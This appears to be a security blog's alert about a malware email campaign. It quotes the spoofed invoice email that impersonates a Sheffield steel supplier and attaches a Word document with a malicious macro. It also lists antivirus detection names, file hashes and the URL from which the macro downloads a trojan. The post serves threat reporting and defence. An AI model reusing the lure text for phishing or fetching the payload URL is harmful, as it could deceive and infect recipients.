New Word malware: Documentation: Your Order Ref: SGM249/013


MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Documentation: Your Order Ref: SGM249/013”.

This email is send from the spoofed address “Jonathan Carroll <Jonathan@john-s-shackleton.co.uk>” and has the following body:

Your Order: SGM249/013
Our Order: 345522
Advice Note: 355187
Despatch Date: 22/12/15

Attachments:
s547369.DOC Shackleton Invoice Number 355187

John S. Shackleton (Sheffield) Ltd
4 Downgate Drive
Sheffield
S4 8BU

Tel: 0114 244 4767
Fax: 0114 242 5965

E-mail: sales@john-s-shackleton.co.uk
Web: www.johnsshackleton.co.uk

Phone us for a free stock brochure.

Our product range includes: Beams, Columns, Pfc’s, Channels, Flats, Rounds, Squares, Angles, Tees, Convex, ERW Tubes, Hollow Section, Cold Reduced Sheet, Hot Rolled Sheet Galvanised Sheet, Zintec Sheet, Floorplate, Open Mesh Flooring, Handrail Standards, Tube, Tubeclamps. Welded Mesh, Expanded Metal, Perforated Sheet, U Edging, Fencing and Bright Bar.

IMPORTANT NOTE

Our Terms and Conditions of Sale apply to all quotations and the supply of all goods. Copies of our Terms and Conditions of Sale are available on request or can be found on our website www.johnsshackleton.co.uk . These Terms and Conditions include a provision (see term 12) that title to goods supplied shall not pass to a customer until payment is received by us in full for all goods supplied. We only accept orders for the supply of goods on the basis our Terms and Conditions of Sale apply.

The attached file s547369.DOC is a Word file with embedded malicious macro.

The malware is detected as HEUR.VBA.Trojan, Trojan:W97M/MaliciousMacro.GEN or heur.macro.download.cc by 4 the 54 AV engines at Virus Total.

Use the Virus Total or Malwr for more detailed information.
SHA256: a3d10e08999093b212be81c3294c0e4dbb90a9a5783179c1158b6fe20af15ed2

Malware is downloaded by the macro from wattplus.net/98g654d/4567gh98.exe

The file 4567gh98.exe is detected as Trojan.Win32.Injector.cdgy (v), PE:Malware.Obscure!1.9C59 [F] or UDS:DangerousObject.Multi.Generic  by 6 of the 55 AV engines at Virus Total.

Use the Virus Total or Malwr for more detailed information.
SHA256: 4985218139506968b541187195a7612ed6da398c88a8ba124201820a617d7d25

One thought on “New Word malware: Documentation: Your Order Ref: SGM249/013

Comments are closed.